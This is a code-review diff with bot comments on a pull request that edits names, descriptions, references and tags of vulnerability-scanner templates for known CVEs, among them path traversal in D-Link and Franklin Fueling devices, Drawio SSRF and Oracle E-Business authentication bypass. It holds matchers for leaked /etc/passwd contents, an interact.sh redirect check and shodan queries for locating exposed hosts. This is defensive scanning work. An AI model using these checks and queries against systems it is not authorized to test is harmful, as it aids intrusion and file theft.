versions before 7.20 contains a known path traversal issue
|
|
||||||
reference:
|
reference:
|
||||||
- https://kerbit.io/research/read/blog/4
|
- https://kerbit.io/research/read/blog/4
|
||||||
- https://www.pascom.net/doc/en/release-notes/
|
- https://www.pascom.net/doc/en/release-notes/
|
||||||
- https://tutorialboy24.blogspot.com/2022/03/the-story-of-3-bugs-that-lead-to.html
|
- https://tutorialboy24.blogspot.com/2022/03/the-story-of-3-bugs-that-lead-to.html
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-45968
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
cvss-score: 7.5
|
cvss-score: 7.5
|
||||||
|
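Review bot: The collapsed description still does not read as a sentence: `Pascom packaged with Cloud Phone System (CPS) versions before 7.20 contain a known local file inclusion vulnerability` carries `Pascom packaged with` over from the old wording. Suggest `Pascom Cloud Phone System (CPS) before 7.20 contains a known path traversal vulnerability that allows local file inclusion.` The name also lacks the `<7.20` range that the description gives and that the other names in this PR carry.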
@ -37,5 +37,7 @@ requests:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
- "status_code_2 != status_code_1"
|
- "status_code_2 != status_code_1"
|
||||||
- "contains(body_2, 'pascom GmbH & Co KG') || contains(body_3, 'pascom GmbH & Co KG')" # Verifying CMS
|
- "contains(body_2, 'pascom GmbH & Co KG') || contains(body_3, 'pascom GmbH & Co KG')" # Verifying CMS
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/29
|
||||||
|
|
|
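Review bot: The inline comment `# Verifying CMS` on the `contains(body_2, 'pascom GmbH & Co KG') ...` line is misleading: pascom is a phone system, not a CMS, and the check is a vendor-string fingerprint. Rename it to something like `# Verifying vendor string` while the comment line below it is being added. The `status_code_2 != status_code_1` comparison is unchanged.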
@ -4,17 +4,17 @@ info:
|
||||||
name: D-Link DAP-1620 - Local File Inclusion
|
name: D-Link DAP-1620 - Local File Inclusion
|
||||||
author: 0x_Akoko
|
author: 0x_Akoko
|
||||||
severity: high
|
severity: high
|
||||||
description: Local File Inclusion due to path traversal in D-Link DAP-1620 leads to unauthorized internal files reading [/etc/passwd] and [/etc/shadow].
|
description: D-Link DAP-1620 is susceptible to local file Inclusion due to path traversal that can lead to unauthorized internal files reading [/etc/passwd] and [/etc/shadow].
|
||||||
reference:
|
reference:
|
||||||
- https://drive.google.com/drive/folders/19OP09msw8l7CJ622nkvnvnt7EKun1eCG?usp=sharing
|
- https://drive.google.com/drive/folders/19OP09msw8l7CJ622nkvnvnt7EKun1eCG?usp=sharing
|
||||||
- https://www.cvedetails.com/cve/CVE-2021-46381/
|
|
||||||
- https://www.dlink.com/en/security-bulletin/
|
- https://www.dlink.com/en/security-bulletin/
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-46381
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
cvss-score: 7.5
|
cvss-score: 7.5
|
||||||
cve-id: CVE-2021-46381
|
cve-id: CVE-2021-46381
|
||||||
cwe-id: CWE-22
|
cwe-id: CWE-22
|
||||||
tags: cve,cve2021,dlink,lfi
|
tags: cve,cve2021,dlink,lfi,router
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: POST
|
- method: POST
|
||||||
|
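Review bot: The rewritten description has a capitalisation slip and an awkward tail: `local file Inclusion` and `unauthorized internal files reading [/etc/passwd] and [/etc/shadow]`. Suggest `D-Link DAP-1620 is susceptible to local file inclusion via path traversal, allowing unauthorized reading of internal files such as /etc/passwd and /etc/shadow.` On the added `router` tag: the DAP-1620 is sold as a Wi-Fi range extender, so a tag that matches the device class is better than one that will mislead people filtering for router findings. The Google Drive link is a fragile citation; the NVD entry added below it is the one that will survive.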
@ -28,3 +28,5 @@ requests:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- "root:.*:0:0:"
|
- "root:.*:0:0:"
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/29
|
||||||
|
|
|
@ -1,22 +1,23 @@
|
||||||
id: CVE-2021-46417
|
id: CVE-2021-46417
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Franklin Fueling Systems Colibri Controller Module - Local File Inclusion
|
name: Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion
|
||||||
author: For3stCo1d
|
author: For3stCo1d
|
||||||
severity: high
|
severity: high
|
||||||
description: |
|
description: |
|
||||||
Insecure handling of a download function leads to disclosure of internal files due to path traversal with root privileges in Franklin Fueling Systems Colibri Controller Module 1.8.19.8580.
|
Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 is susceptible to local file inclusion because of insecure handling of a download function that leads to disclosure of internal files due to path traversal with root privileges.
|
||||||
reference:
|
reference:
|
||||||
- https://packetstormsecurity.com/files/166671/Franklin-Fueling-Systems-Colibri-Controller-Module-1.8.19.8580-Local-File-Inclusion.html
|
- https://packetstormsecurity.com/files/166671/Franklin-Fueling-Systems-Colibri-Controller-Module-1.8.19.8580-Local-File-Inclusion.html
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-46417
|
|
||||||
- https://drive.google.com/drive/folders/1Yu4aVDdrgvs-F9jP3R8Cw7qo_TC7VB-R
|
- https://drive.google.com/drive/folders/1Yu4aVDdrgvs-F9jP3R8Cw7qo_TC7VB-R
|
||||||
- http://packetstormsecurity.com/files/166610/FFS-Colibri-Controller-Module-1.8.19.8580-Directory-Traversal.html
|
- http://packetstormsecurity.com/files/166610/FFS-Colibri-Controller-Module-1.8.19.8580-Directory-Traversal.html
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-46417
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
cvss-score: 7.5
|
cvss-score: 7.5
|
||||||
cve-id: CVE-2021-46417
|
cve-id: CVE-2021-46417
|
||||||
cwe-id: CWE-22
|
cwe-id: CWE-22
|
||||||
metadata:
|
metadata:
|
||||||
|
verified: true
|
||||||
shodan-query: http.html:"Franklin Fueling Systems"
|
shodan-query: http.html:"Franklin Fueling Systems"
|
||||||
tags: cve,cve2021,franklinfueling,lfi
|
tags: cve,cve2021,franklinfueling,lfi
|
||||||
|
|
||||||
|
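Review bot: The rewritten description chains three causal phrases and is harder to follow than the original: `is susceptible to local file inclusion because of insecure handling of a download function that leads to disclosure of internal files due to path traversal with root privileges`. Suggest `... 1.8.19.8580 is susceptible to local file inclusion: a download function does not sanitise paths, so path traversal discloses internal files readable as root.` Adding the version to the name and `verified: true` to the metadata is good.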
@ -30,3 +31,5 @@ requests:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- "root:.*:0:0:"
|
- "root:.*:0:0:"
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/29
|
||||||
|
|
|
@ -4,15 +4,16 @@ info:
|
||||||
name: WordPress Page Builder KingComposer <=2.9.6 - Open Redirect
|
name: WordPress Page Builder KingComposer <=2.9.6 - Open Redirect
|
||||||
author: akincibor
|
author: akincibor
|
||||||
severity: high
|
severity: high
|
||||||
description: The plugin does not validate the id parameter before redirecting the user to it via the kc_get_thumbn AJAX action available to both unauthenticated and authenticated users.
|
description: WordPress Page Builder KingComposer 2.9.6 and prior does not validate the id parameter before redirecting the user to it via the kc_get_thumbn AJAX action (which is available to both unauthenticated and authenticated users).
|
||||||
reference:
|
reference:
|
||||||
- https://wpscan.com/vulnerability/906d0c31-370e-46b4-af1f-e52fbddd00cb
|
- https://wpscan.com/vulnerability/906d0c31-370e-46b4-af1f-e52fbddd00cb
|
||||||
tags: cve,cve2022,wp-plugin,redirect,wordpress
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-0165
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
|
||||||
cvss-score: 8.80
|
cvss-score: 8.80
|
||||||
cve-id: CVE-2022-0165
|
cve-id: CVE-2022-0165
|
||||||
cwe-id: CWE-601
|
cwe-id: CWE-601
|
||||||
|
tags: cve,cve2022,wp-plugin,redirect,wordpress,wp
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
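Review bot: Moving `tags:` out of the reference list, where it had been wedged between the WPScan link and `classification:`, is the important fix in this hunk. While here, `cvss-score: 8.80` should be `8.8` to match the one-decimal form used in every other template in this PR. The vector `AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H`, claiming full confidentiality, integrity and availability impact for an open redirect, is also worth checking against the WPScan and NVD entries before merge; if those sources score it lower, the template should follow them.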
@ -24,3 +25,5 @@ requests:
|
||||||
part: header
|
part: header
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/29
|
||||||
|
|
|
@ -1,22 +1,22 @@
|
||||||
id: CVE-2022-1119
|
id: CVE-2022-1119
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: WordPress Simple File List < 3.2.8 - Arbitrary File Retrieval
|
name: WordPress Simple File List <3.2.8 - Local File Inclusion
|
||||||
author: random-robbie
|
author: random-robbie
|
||||||
severity: high
|
severity: high
|
||||||
description: |
|
description: |
|
||||||
The Wordpress plugin is vulnerable to arbitrary file retrieval via the eeFile parameter found in the ~/includes/ee-downloader.php file due to missing controls which make it possible for unauthenticated attackers retrieve arbitrary files.
|
WordPress Simple File List before 3.2.8 is vulnerable to local file inclusion via the eeFile parameter in the ~/includes/ee-downloader.php due to missing controls which make it possible for unauthenticated attackers retrieve arbitrary files.
|
||||||
reference:
|
reference:
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-1119
|
|
||||||
- https://wpscan.com/vulnerability/5551038f-64fb-44d8-bea0-d2f00f04877e
|
- https://wpscan.com/vulnerability/5551038f-64fb-44d8-bea0-d2f00f04877e
|
||||||
- https://wpscan.com/vulnerability/075a3cc5-1970-4b64-a16f-3ec97e22b606
|
- https://wpscan.com/vulnerability/075a3cc5-1970-4b64-a16f-3ec97e22b606
|
||||||
- https://plugins.trac.wordpress.org/browser/simple-file-list/trunk/includes/ee-downloader.php?rev=2071880
|
- https://plugins.trac.wordpress.org/browser/simple-file-list/trunk/includes/ee-downloader.php?rev=2071880
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-1119
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
cvss-score: 7.5
|
cvss-score: 7.5
|
||||||
cve-id: CVE-2022-1119
|
cve-id: CVE-2022-1119
|
||||||
cwe-id: CWE-22
|
cwe-id: CWE-22
|
||||||
tags: cve,cve2022,lfi,wordpress
|
tags: cve,cve2022,lfi,wordpress,wp,wp-plugin
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
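Review bot: The new description drops two words: `via the eeFile parameter in the ~/includes/ee-downloader.php due to` is missing `file` after the path, and `make it possible for unauthenticated attackers retrieve arbitrary files` is missing `to`. Suggest `... via the eeFile parameter in the ~/includes/ee-downloader.php file, due to missing access controls, which makes it possible for unauthenticated attackers to retrieve arbitrary files.` The tag additions (`wp`, `wp-plugin`) match the other WordPress templates in the PR.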
@ -25,6 +25,7 @@ requests:
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
part: body
|
part: body
|
||||||
words:
|
words:
|
||||||
|
@ -35,3 +36,5 @@ requests:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/29
|
||||||
|
|
|
@ -1,21 +1,21 @@
|
||||||
id: CVE-2022-1392
|
id: CVE-2022-1392
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Videos sync PDF <= 1.7.4 - Unauthenticated LFI
|
name: WordPress Videos sync PDF <=1.7.4 - Local File Inclusion
|
||||||
author: Veshraj
|
author: Veshraj
|
||||||
severity: high
|
severity: high
|
||||||
description: The plugin does not validate the p parameter before using it in an include statement, which could lead to Local File Inclusion issues.
|
description: WordPress Videos sync PDF 1.7.4 and prior does not validate the p parameter before using it in an include statement, which could lead to local file inclusion.
|
||||||
reference:
|
reference:
|
||||||
- https://wpscan.com/vulnerability/fe3da8c1-ae21-4b70-b3f5-a7d014aa3815
|
- https://wpscan.com/vulnerability/fe3da8c1-ae21-4b70-b3f5-a7d014aa3815
|
||||||
- https://packetstormsecurity.com/files/166534/
|
- https://packetstormsecurity.com/files/166534/
|
||||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1392
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-1392
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
cvss-score: 7.5
|
cvss-score: 7.5
|
||||||
cve-id: CVE-2022-1392
|
cve-id: CVE-2022-1392
|
||||||
metadata:
|
metadata:
|
||||||
verified: true
|
verified: true
|
||||||
tags: lfi,wp-plugin,cve,cve2022,wp,wordpress,unauth
|
tags: cve,cve2022,lfi,wp-plugin,wp,wordpress,unauth
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
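Review bot: `classification:` here has `cvss-metrics`, `cvss-score` and `cve-id` but no `cwe-id`, while the other LFI templates in this PR carry `cwe-id: CWE-22`. Since the description says the `p` parameter is used unvalidated in an `include` statement, CWE-98 (PHP file inclusion) or CWE-22 fits; add one so the block is complete. Replacing the MITRE link with the NVD entry is consistent with the rest of the PR.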
@ -34,3 +34,5 @@ requests:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/29
|
||||||
|
|
|
@ -1,23 +1,23 @@
|
||||||
id: CVE-2022-1713
|
id: CVE-2022-1713
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Drawio - SSRF on /proxy endpoint
|
name: Drawio <18.0.4 - Server-Side Request Forgery
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
severity: high
|
severity: high
|
||||||
description: |
|
description: |
|
||||||
SSRF on /proxy in GitHub repository jgraph/drawio prior to 18.0.4. An attacker can make a request as the server and read its contents. This can lead to a leak of sensitive information.
|
Drawio prior to 18.0.4 is vulnerable to server-side request forgery. An attacker can make a request as the server and read its contents. This can lead to a leak of sensitive information.
|
||||||
reference:
|
reference:
|
||||||
- https://huntr.dev/bounties/cad3902f-3afb-4ed2-abd0-9f96a248de11
|
- https://huntr.dev/bounties/cad3902f-3afb-4ed2-abd0-9f96a248de11
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-1713
|
|
||||||
- https://github.com/jgraph/drawio/commit/283d41ec80ad410d68634245cf56114bc19331ee
|
- https://github.com/jgraph/drawio/commit/283d41ec80ad410d68634245cf56114bc19331ee
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-1713
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
cvss-score: 7.5
|
cvss-score: 7.5
|
||||||
cve-id: CVE-2022-1713
|
cve-id: CVE-2022-1713
|
||||||
cwe-id: CWE-918
|
cwe-id: CWE-918
|
||||||
metadata:
|
metadata:
|
||||||
|
verified: true
|
||||||
shodan-query: http.title:"Flowchart Maker"
|
shodan-query: http.title:"Flowchart Maker"
|
||||||
verified: "true"
|
|
||||||
tags: cve,cve2022,drawio,ssrf,oss
|
tags: cve,cve2022,drawio,ssrf,oss
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
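Review bot: The rewritten description loses the only technical locator the old text had: `SSRF on /proxy in GitHub repository jgraph/drawio prior to 18.0.4` becomes `Drawio prior to 18.0.4 is vulnerable to server-side request forgery`, and since the old name (`SSRF on /proxy endpoint`) is also replaced, the endpoint no longer appears anywhere in the info block. Keep it: `Drawio prior to 18.0.4 is vulnerable to server-side request forgery via the /proxy endpoint. ...`. The `verified: true` move and typing are fine.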
@ -31,9 +31,11 @@ requests:
|
||||||
- type: word
|
- type: word
|
||||||
part: body
|
part: body
|
||||||
words:
|
words:
|
||||||
- "<title>Flowchart Maker & Online Diagram Software</title>"
|
- "<title>Flowchart Maker & Online Diagram Software</title>"
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
part: header
|
part: header
|
||||||
words:
|
words:
|
||||||
- "application/octet-stream"
|
- "application/octet-stream"
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/29
|
||||||
|
|
|
@ -1,24 +1,24 @@
|
||||||
id: CVE-2022-21500
|
id: CVE-2022-21500
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Oracle E-Business - Login Panel Registration Accessible
|
name: Oracle E-Business Suite <=12.2 - Authentication Bypass
|
||||||
author: 3th1c_yuk1,tess
|
author: 3th1c_yuk1,tess
|
||||||
severity: high
|
severity: high
|
||||||
description: |
|
description: |
|
||||||
Vulnerability in Oracle E-Business Suite (component: Manage Proxies). Supported versions that are affected are 12.1 and 12.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle E-Business Suite. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle E-Business Suite accessible data. Note: Authentication is required for successful attack, however the user may be self-registered.
|
Oracle E-Business Suite (component: Manage Proxies) 12.1 and 12.2 are susceptible to an easily exploitable vulnerability that allows an unauthenticated attacker with network access via HTTP to compromise it by self-registering for an account. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle E-Business Suite accessible data.
|
||||||
reference:
|
reference:
|
||||||
- https://orwaatyat.medium.com/my-new-discovery-in-oracle-e-business-login-panel-that-allowed-to-access-for-all-employees-ed0ec4cad7ac
|
- https://orwaatyat.medium.com/my-new-discovery-in-oracle-e-business-login-panel-that-allowed-to-access-for-all-employees-ed0ec4cad7ac
|
||||||
- https://twitter.com/GodfatherOrwa/status/1514720677173026816
|
- https://twitter.com/GodfatherOrwa/status/1514720677173026816
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-21500
|
|
||||||
- https://www.oracle.com/security-alerts/alert-cve-2022-21500.html
|
- https://www.oracle.com/security-alerts/alert-cve-2022-21500.html
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-21500
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
cvss-score: 7.5
|
cvss-score: 7.5
|
||||||
cve-id: CVE-2022-21500
|
cve-id: CVE-2022-21500
|
||||||
metadata:
|
metadata:
|
||||||
|
verified: true
|
||||||
shodan-query: http.title:"Login" "X-ORACLE-DMS-ECID" 200
|
shodan-query: http.title:"Login" "X-ORACLE-DMS-ECID" 200
|
||||||
verified: "true"
|
tags: cve,cve2022,oracle,misconfig,auth-bypass
|
||||||
tags: oracle,misconfig,cve,cve2022
|
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
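Review bot: the rewritten description drops Oracle's note that "Authentication is required for successful attack, however the user may be self-registered", and now opens with "an unauthenticated attacker"; the precondition is the real exposure (open self-registration on the login panel), so keep it explicit, e.g. "an attacker who self-registers an account can then access ...". The name also says `<=12.2` while the description says the affected supported versions are 12.1 and 12.2; align the two.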
@ -37,3 +37,5 @@ requests:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/29
|
||||||
|
|
|
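Review bot: only the `status: 200` matcher is visible in this hunk, and a 200 on an Oracle E-Business login page is not by itself evidence that registration is reachable; confirm the template sets `matchers-condition: and` together with a body/word matcher for the registration page, otherwise every EBS login panel found by the shodan query above will report as vulnerable.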
@ -1,13 +1,13 @@
|
||||||
id: CVE-2022-23347
|
id: CVE-2022-23347
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: BigAnt Software BigAnt Server v5.6.06 - Directory Traversal
|
name: BigAnt Server v5.6.06 - Local File Inclusion
|
||||||
author: 0x_Akoko
|
author: 0x_Akoko
|
||||||
severity: high
|
severity: high
|
||||||
description: BigAnt Software BigAnt Server v5.6.06 was discovered to be vulnerable to directory traversal attacks.
|
description: BigAnt Server v5.6.06 is vulnerable to local file inclusion.
|
||||||
reference:
|
reference:
|
||||||
- https://github.com/bzyo/cve-pocs/tree/master/CVE-2022-23347
|
- https://github.com/bzyo/cve-pocs/tree/master/CVE-2022-23347
|
||||||
- https://www.cvedetails.com/cve/CVE-2022-23347
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-23347
|
||||||
- http://bigant.com
|
- http://bigant.com
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
|
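Review bot: swapping cvedetails for `https://nvd.nist.gov/vuln/detail/CVE-2022-23347` is good, but `http://bigant.com` is a plain-HTTP vendor homepage that documents nothing about this finding; drop it or replace it with the vendor advisory. The description also loses its only specific wording ("directory traversal attacks") in favour of "local file inclusion" while the linked PoC describes a traversal-based file read.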
@ -15,6 +15,7 @@ info:
|
||||||
cve-id: CVE-2022-23347
|
cve-id: CVE-2022-23347
|
||||||
cwe-id: CWE-22
|
cwe-id: CWE-22
|
||||||
metadata:
|
metadata:
|
||||||
|
verified: true
|
||||||
shodan-query: http.html:"BigAnt"
|
shodan-query: http.html:"BigAnt"
|
||||||
tags: cve,cve2022,bigant,lfi
|
tags: cve,cve2022,bigant,lfi
|
||||||
|
|
||||||
|
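Review bot: `cwe-id: CWE-22` (path traversal) and the `lfi` tag/new "Local File Inclusion" name now disagree on the weakness class; CWE-22 describes reading a file via `../` sequences, which is what the PoC reference shows, so either keep "Directory Traversal" in the name or explain why LFI (server-side inclusion of the file) is the right label.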
@ -36,3 +37,5 @@ requests:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/29
|
||||||
|
|
|
@ -1,16 +1,18 @@
|
||||||
id: CVE-2022-24856
|
id: CVE-2022-24856
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Flyte Console < 0.52.0 - Server Side Request Forgery (SSRF)
|
name: Flyte Console <0.52.0 - Server-Side Request Forgery
|
||||||
author: pdteam
|
author: pdteam
|
||||||
severity: high
|
severity: high
|
||||||
description: |
|
description: |
|
||||||
FlyteConsole is the web user interface for the Flyte platform. FlyteConsole prior to version 0.52.0 is vulnerable to server-side request forgery (SSRF) when FlyteConsole is open to the general internet. An attacker can exploit any user of a vulnerable instance to access the internal metadata server or other unauthenticated URLs. Passing of headers to an unauthorized actor may occur. The patch for this issue deletes the entire `cors_proxy`, as this is not required for console anymore. A patch is available in FlyteConsole version 0.52.0. Disable FlyteConsole availability on the internet as a workaround.
|
FlyteConsole is the web user interface for the Flyte platform. FlyteConsole prior to version 0.52.0 is vulnerable to server-side request forgery when FlyteConsole is open to the general internet. An attacker can exploit any user of a vulnerable instance to access the internal metadata server or other unauthenticated URLs. Passing of headers to an unauthorized actor may occur.
|
||||||
|
remediation: |
|
||||||
|
The patch for this issue deletes the entire cors_proxy, as this is no longer required for the console. A patch is available in FlyteConsole version 0.52.0, or as a work-around disable FlyteConsole.
|
||||||
reference:
|
reference:
|
||||||
- https://github.com/flyteorg/flyteconsole/security/advisories/GHSA-www6-hf2v-v9m9
|
- https://github.com/flyteorg/flyteconsole/security/advisories/GHSA-www6-hf2v-v9m9
|
||||||
- https://github.com/flyteorg/flyteconsole/pull/389
|
- https://github.com/flyteorg/flyteconsole/pull/389
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-24856
|
|
||||||
- https://hackerone.com/reports/1540906
|
- https://hackerone.com/reports/1540906
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-24856
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
cvss-score: 7.5
|
cvss-score: 7.5
|
||||||
|
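Review bot: the new `remediation` block changes the advisory's workaround. The original description said "Disable FlyteConsole availability on the internet as a workaround" (restrict exposure); the new text says "as a work-around disable FlyteConsole", which tells operators to switch the console off entirely. Restore the original scope, e.g. "or as a workaround do not expose FlyteConsole to the internet".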
@ -27,3 +29,5 @@ requests:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "Interactsh Server"
|
- "Interactsh Server"
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/29
|
||||||
|
|
|
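Review bot: the `"Interactsh Server"` word matcher only fires if the target echoes the body of the proxied OAST response and the OAST server returns that exact banner; a self-hosted interactsh instance or a changed default page breaks detection. Add a second matcher on `part: interactsh_protocol` with `words: - "http"` so the callback itself is accepted as evidence even when the body is not reflected.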
@ -1,11 +1,11 @@
|
||||||
id: CVE-2022-24900
|
id: CVE-2022-24900
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Piano LED Visualizer 1.3 - Directory traversal
|
name: Piano LED Visualizer 1.3 - Local File Inclusion
|
||||||
author: 0x_Akoko
|
author: 0x_Akoko
|
||||||
severity: high
|
severity: high
|
||||||
description: |
|
description: |
|
||||||
Piano LED Visualizer is software that allows LED lights to light up as a person plays a piano connected to a computer. Version 1.3 and prior are vulnerable to a path traversal attack.
|
Piano LED Visualizer 1.3 and prior are vulnerable to local file inclusion.
|
||||||
reference:
|
reference:
|
||||||
- https://github.com/onlaj/Piano-LED-Visualizer/issues/350
|
- https://github.com/onlaj/Piano-LED-Visualizer/issues/350
|
||||||
- https://vuldb.com/?id.198714
|
- https://vuldb.com/?id.198714
|
||||||
|
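Review bot: the name keeps `Piano LED Visualizer 1.3` while the description says "1.3 and prior"; use `<=1.3` in the name, as the other templates in this PR do (`<0.52.0`, `<=12.2`). This is also the one template in the PR whose reference list gains no `https://nvd.nist.gov/vuln/detail/` entry; add it for consistency with the others.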
@ -16,7 +16,7 @@ info:
|
||||||
cvss-score: 8.6
|
cvss-score: 8.6
|
||||||
cve-id: CVE-2022-24900
|
cve-id: CVE-2022-24900
|
||||||
cwe-id: CWE-610
|
cwe-id: CWE-610
|
||||||
tags: lfi,cve2022,cve,piano,iot,oss
|
tags: cve,cve2022,lfi,piano,iot,oss
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
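Review bot: `cwe-id: CWE-610` is a broad category (externally controlled reference to a resource in another sphere), while the template is tagged `lfi` and renamed "Local File Inclusion"; if the aim is consistency with the BigAnt template in this PR, which uses CWE-22 for the same kind of traversal read, state which CWE the source advisory assigns so the classification is traceable rather than inferred.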
@ -33,3 +33,5 @@ requests:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
|
# Enhanced by mp on 2022/06/29
|
||||||
|
|
|
@ -1,13 +1,13 @@
|
||||||
id: CVE-2022-25216
|
id: CVE-2022-25216
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: DVDFab 12 Player/PlayerFab - Arbitrary File Read
|
name: DVDFab 12 Player/PlayerFab - Local File Inclusion
|
||||||
author: 0x_Akoko
|
author: 0x_Akoko
|
||||||
severity: high
|
severity: high
|
||||||
description: An absolute path traversal vulnerability allows a remote attacker to download any file on the Windows file system for which the user account running DVDFab 12 Player (recently renamed PlayerFab) has read-access
|
description: DVDFab 12 Player/PlayerFab is susceptible to local file inclusion which allows a remote attacker to download any file on the Windows file system for which the user account running DVDFab 12 Player (recently renamed PlayerFab) has read-access.
|
||||||
reference:
|
reference:
|
||||||
- https://www.tenable.com/security/research/tra-2022-07
|
- https://www.tenable.com/security/research/tra-2022-07
|
||||||
- https://www.cvedetails.com/cve/CVE-2022-25216
